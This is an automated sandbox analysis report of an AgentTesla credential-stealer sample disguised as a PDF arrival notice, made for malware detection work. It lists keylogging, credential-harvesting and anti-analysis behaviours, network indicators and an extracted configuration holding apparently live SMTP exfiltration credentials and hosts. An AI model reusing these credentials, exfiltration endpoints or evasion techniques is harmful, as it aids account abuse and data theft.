Play interactive tour

Edit tour

Analysis Report Arrivalnotice2020pdf.exe

Overview

General Information

Sample Name:	Arrivalnotice2020pdf.exe
Analysis ID:	323773
MD5:	ed6f9a5ace6367f4e532dd4ec40762ac
SHA1:	5ed4fd1e8a4e7dbed31928c2b7dd2ca1043cb68e
SHA256:	df107977e92465958c206bf42e33ce394e8573da3c4035b69bfa0d0eaf367914
Tags:	AgentTeslaexe
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: MSBuild connects to smtp port

Yara detected AgentTesla

.NET source code contains very large array initializations

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Machine Learning detection for sample

Maps a DLL or memory area into another process

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

Arrivalnotice2020pdf.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\Arrivalnotice2020pdf.exe' MD5: ED6F9A5ACE6367F4E532DD4EC40762AC)

conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MSBuild.exe (PID: 2540 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "zSmwx", "URL: ": "https://dBHeYNWtul3f.net", "To: ": "akannwater@gmail.com", "ByHost: ": "webmail.hapkidocollege.com.au:587", "Password: ": "pXS5n2E1Xj", "From: ": "train@hapkidocollege.com.au"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Arrivalnotice2020pdf.exe PID: 5492	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 2540	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 2540	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Arrivalnotice2020pdf.exe.b0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: MSBuild connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.9.171.52, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, Initiated: true, ProcessId: 2540, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49719

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: MSBuild.exe.2540.3.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "zSmwx", "URL: ": "https://dBHeYNWtul3f.net", "To: ": "akannwater@gmail.com", "ByHost: ": "webmail.hapkidocollege.com.au:587", "Password: ": "pXS5n2E1Xj", "From: ": "train@hapkidocollege.com.au"}

Multi AV Scanner detection for submitted file

Show sources

Source: Arrivalnotice2020pdf.exe

Virustotal: Detection: 22%

Perma Link

Machine Learning detection for sample

Show sources

Source: Arrivalnotice2020pdf.exe

Joe Sandbox ML: detected

Source: 3.2.MSBuild.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 103.9.171.52:587

Source: Joe Sandbox View	IP Address: 174.129.214.20 174.129.214.20
Source: Joe Sandbox View	IP Address: 174.129.214.20 174.129.214.20

Source: Joe Sandbox View

ASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 103.9.171.52:587

Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220
Source: unknown	TCP traffic detected without corresponding DNS query: 92.122.145.220

Source: unknown

DNS traffic detected: queries for: webmail.hapkidocollege.com.au

Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: http://ZLVZGU.com
Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org/
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org/(
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgx&
Source: Arrivalnotice2020pdf.exe, 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: MSBuild.exe, 00000003.00000002.479039341.000000000364E000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.479119119.0000000003668000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://dBHeYNWtul3f.net
Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: Arrivalnotice2020pdf.exe, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49678
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49680
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 3.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b4A8BF70Cu002d7F0Au002d482Au002dA4C2u002dD390DFF70F9Fu007d/u003969E92F2u002d42FDu002d4329u002d80A2u002d2D59A2934EA4.cs

Large array initialization: .cctor: array initializer size 12028

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Arrivalnotice2020pdf.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0168B0BA NtQuerySystemInformation,		3_2_0168B0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0168B089 NtQuerySystemInformation,		3_2_0168B089

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000C583D	0_2_000C583D
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000C6835	0_2_000C6835
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000C50C1	0_2_000C50C1
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000D80D5	0_2_000D80D5
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000BA194	0_2_000BA194
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B8273	0_2_000B8273
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000C4B51	0_2_000C4B51
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B8B7F	0_2_000B8B7F
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000BE3A9	0_2_000BE3A9
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B93E9	0_2_000B93E9
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000C45E1	0_2_000C45E1
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B7F50	0_2_000B7F50
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B8767	0_2_000B8767
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B8FB4	0_2_000B8FB4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_055892E8	3_2_055892E8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADB4ED0	3_2_0ADB4ED0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADB2EE8	3_2_0ADB2EE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADB7AE0	3_2_0ADB7AE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADB6EB8	3_2_0ADB6EB8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADB0070	3_2_0ADB0070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADB2E89	3_2_0ADB2E89
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADB6EA8	3_2_0ADB6EA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADED9D0	3_2_0ADED9D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADEAEB8	3_2_0ADEAEB8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADEBDAC	3_2_0ADEBDAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADED578	3_2_0ADED578
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADE0070	3_2_0ADE0070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADE5930	3_2_0ADE5930
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0ADE0007	3_2_0ADE0007

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Code function: String function: 000BAF40 appears 39 times

Source: Arrivalnotice2020pdf.exe	Binary or memory string: OriginalFilename vs Arrivalnotice2020pdf.exe
Source: Arrivalnotice2020pdf.exe, 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenamefobWaEQAeVYNzsIgHQxKLyzadmXNXRmrUHO.exe4 vs Arrivalnotice2020pdf.exe
Source: Arrivalnotice2020pdf.exe, 00000000.00000003.210597797.0000000002FB6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Arrivalnotice2020pdf.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Section loaded: security.dll

Jump to behavior

Source: 3.2.MSBuild.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.MSBuild.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@2/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0168AF3E AdjustTokenPrivileges,		3_2_0168AF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_0168AF07 AdjustTokenPrivileges,		3_2_0168AF07

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_01

Source: Arrivalnotice2020pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Arrivalnotice2020pdf.exe

Virustotal: Detection: 22%

Source: unknown	Process created: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe 'C:\Users\user\Desktop\Arrivalnotice2020pdf.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: Arrivalnotice2020pdf.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: Arrivalnotice2020pdf.exe, 00000000.00000003.210004019.0000000002FF0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Arrivalnotice2020pdf.exe, 00000000.00000003.210004019.0000000002FF0000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: MSBuild.exe, 00000003.00000002.482322603.00000000075A0000.00000002.00000001.sdmp

Source: Arrivalnotice2020pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Arrivalnotice2020pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Arrivalnotice2020pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Arrivalnotice2020pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Arrivalnotice2020pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Code function: 0_2_000C215C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_000C215C

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000D0554 push eax; ret	0_2_000D05B9
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000D0608 push eax; ret	0_2_000D05B9
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B5655 push ecx; ret	0_2_000B5668
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000BAF85 push ecx; ret	0_2_000BAF98

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
